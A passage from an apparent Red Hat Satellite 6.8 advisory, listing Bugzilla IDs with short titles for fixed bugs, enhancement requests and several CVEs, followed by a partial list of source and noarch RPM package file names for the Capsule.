1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method `tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or method `implicit_order_column' for #<ActiveRecord::Associations::CollectionProxy> on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #<Safemode::ScopeObject>"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined method `klass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: <uuid> is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method `default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with error `requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv
1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #<Safemode::ScopeObject>
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
6. Package List:
Red Hat Satellite Capsule 6.8:
Source:
ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm
ansible-runner-1.4.6-1.el7ar.src.rpm
ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm
ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm
ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm
createrepo_c-0.7.4-1.el7sat.src.rpm
foreman-2.1.2.19-1.el7sat.src.rpm
foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm
foreman-discovery-image-3.6.7-1.el7sat.src.rpm
foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm
foreman-installer-2.1.2.8-1.el7sat.src.rpm
foreman-proxy-2.1.2-2.el7sat.src.rpm
future-0.16.0-11.el7sat.src.rpm
gofer-2.12.5-7.el7sat.src.rpm
hfsplus-tools-332.14-12.el7.src.rpm
katello-3.16.0-1.el7sat.src.rpm
katello-certs-tools-2.7.1-1.el7sat.src.rpm
katello-client-bootstrap-1.7.5-1.el7sat.src.rpm
katello-selinux-3.4.0-1.el7sat.src.rpm
kobo-0.5.1-1.el7sat.src.rpm
libmodulemd-1.7.0-1.pulp.el7sat.src.rpm
libsolv-0.7.4-4.pulp.el7sat.src.rpm
libwebsockets-2.4.2-2.el7.src.rpm
livecd-tools-20.4-1.6.el7sat.src.rpm
mod_xsendfile-0.12-11.el7sat.src.rpm
ostree-2017.1-2.atomic.el7.src.rpm
pulp-2.21.3-1.el7sat.src.rpm
pulp-docker-3.2.7-1.el7sat.src.rpm
pulp-katello-1.0.3-1.el7sat.src.rpm
pulp-ostree-1.3.1-2.el7sat.src.rpm
pulp-puppet-2.21.3-2.el7sat.src.rpm
pulp-rpm-2.21.3-2.el7sat.src.rpm
puppet-agent-6.14.0-2.el7sat.src.rpm
puppet-agent-oauth-0.5.1-3.el7sat.src.rpm
puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm
puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm
puppetserver-6.13.0-1.el7sat.src.rpm
pycairo-1.16.3-9.el7sat.src.rpm
pygobject3-3.28.3-2.el7sat.src.rpm
python-amqp-2.2.2-5.el7sat.src.rpm
python-anyjson-0.3.3-11.el7sat.src.rpm
python-apypie-0.2.2-1.el7sat.src.rpm
python-billiard-3.5.0.3-3.el7sat.src.rpm
python-blinker-1.3-2.el7sat.src.rpm
python-celery-4.0.2-9.el7sat.src.rpm
python-click-6.7-9.el7sat.src.rpm
python-crane-3.3.1-9.el7sat.src.rpm
python-daemon-2.1.2-7.el7at.src.rpm
python-django-1.11.29-1.el7sat.src.rpm
python-flask-0.12.2-4.el7sat.src.rpm
python-gnupg-0.3.7-1.el7ui.src.rpm
python-isodate-0.5.4-12.el7sat.src.rpm
python-itsdangerous-0.24-15.el7sat.src.rpm
python-jinja2-2.10-10.el7sat.src.rpm
python-jmespath-0.9.0-6.el7_7.src.rpm
python-kid-0.9.6-11.el7sat.src.rpm
python-kombu-4.0.2-13.el7sat.src.rpm
python-lockfile-0.11.0-10.el7ar.src.rpm
python-markupsafe-0.23-21.el7sat.src.rpm
python-mongoengine-0.10.5-2.el7sat.src.rpm
python-nectar-1.6.2-1.el7sat.src.rpm
python-oauth2-1.5.211-8.el7sat.src.rpm
python-okaara-1.0.37-2.el7sat.src.rpm
python-pexpect-4.6-1.el7at.src.rpm
python-psutil-5.0.1-3.el7sat.src.rpm
python-ptyprocess-0.5.2-3.el7at.src.rpm
python-pycurl-7.43.0.2-4.el7sat.src.rpm
python-pymongo-3.2-2.el7sat.src.rpm
python-qpid-1.35.0-5.el7.src.rpm
python-semantic_version-2.2.0-6.el7sat.src.rpm
python-simplejson-3.2.0-1.el7sat.src.rpm
python-twisted-16.4.1-12.el7sat.src.rpm
python-vine-1.1.3-6.el7sat.src.rpm
python-werkzeug-0.12.2-5.el7sat.src.rpm
python-zope-interface-4.0.5-4.el7.src.rpm
qpid-cpp-1.36.0-28.el7amq.src.rpm
qpid-dispatch-1.5.0-4.el7.src.rpm
qpid-proton-0.28.0-3.el7.src.rpm
redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm
repoview-0.6.6-11.el7sat.src.rpm
rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm
rubygem-highline-1.7.8-3.el7sat.src.rpm
rubygem-newt-0.9.6-3.el7sat.src.rpm
rubygem-oauth-0.5.4-2.el7sat.src.rpm
saslwrapper-0.22-5.el7sat.src.rpm
satellite-6.8.0-1.el7sat.src.rpm
satellite-installer-6.8.0.11-1.el7sat.src.rpm
tfm-6.1-1.el7sat.src.rpm
tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm
tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm
tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm
tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm
tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm
tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm
tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm
tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm
tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm
tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm
tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm
tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm
tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm
tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm
tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm
tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm
tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm
tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm
tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm
tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm
tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm
tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm
tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm
tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm
tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm
tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm
tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm
tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm
tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm
tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm
tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm
tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm
tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm
tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm
tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm
tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm
tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm
tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm
tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm
tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm
tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm
tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm
tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm
tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm
tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm
tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm
tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm
tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm
tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm
tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm
tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm
tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm
tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm
tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm
tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm
tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm
tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm
tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm
tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm
tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm
tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm
tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm
tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm
tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm
tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm
tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm
noarch:
ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm
ansible-runner-1.4.6-1.el7ar.noarch.rpm
ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm
ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm
ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm
crane-selinux-3.4.0-1.el7sat.noarch.rpm
foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm
foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm
foreman-debug-2.1.2.19-1.el7sat.noarch.rpm
foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm
foreman-installer-2.1.2.8-1.el7sat.noarch.rpm
foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm
foreman-proxy-2.1.2-2.el7sat.noarch.rpm
foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm
foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm
katello-certs-tools-2.7.1-1.el7sat.noarch.rpm
katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm
katello-common-3.16.0-1.el7sat.noarch.rpm
katello-debug-3.16.0-1.el7sat.noarch.rpm
kobo-0.5.1-1.el7sat.noarch.rpm
pulp-admin-client-2.21.3-1.el7sat.noarch.rpm
pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm
pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm
pulp-katello-1.0.3-1.el7sat.noarch.rpm
pulp-maintenance-2.21.3-1.el7sat.noarch.rpm
pulp-nodes-child-2.21.3-1.el7sat.noarch.rpm
pulp-nodes-common-2.21.3-1.el7sat.noarch.rpm
pulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm
pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm
pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm
pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm
pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm
pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm
pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm
pulp-selinux-2.21.3-1.el7sat.noarch.rpm
pulp-server-2.21.3-1.el7sat.noarch.rpm
puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm
puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm
puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm
puppetserver-6.13.0-1.el7sat.noarch.rpm
python-blinker-1.3-2.el7sat.noarch.rpm
python-gnupg-0.3.7-1.el7ui.noarch.rpm
python-gofer-2.12.5-7.el7sat.noarch.rpm
python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm
python-kid-0.9.6-11.el7sat.noarch.rpm
python-mongoengine-0.10.5-2.el7sat.noarch.rpm
python-nectar-1.6.2-1.el7sat.noarch.rpm
python-oauth2-1.5.211-8.el7sat.noarch.rpm
python-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm
python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm
python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm
python-pulp-common-2.21.3-1.el7sat.noarch.rpm
python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm
python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm
python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm
python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm
python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm
python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm
python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm
python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm
python-qpid-1.35.0-5.el7.noarch.rpm
python-semantic_version-2.2.0-6.el7sat.noarch.rpm
python2-amqp-2.2.2-5.el7sat.noarch.rpm
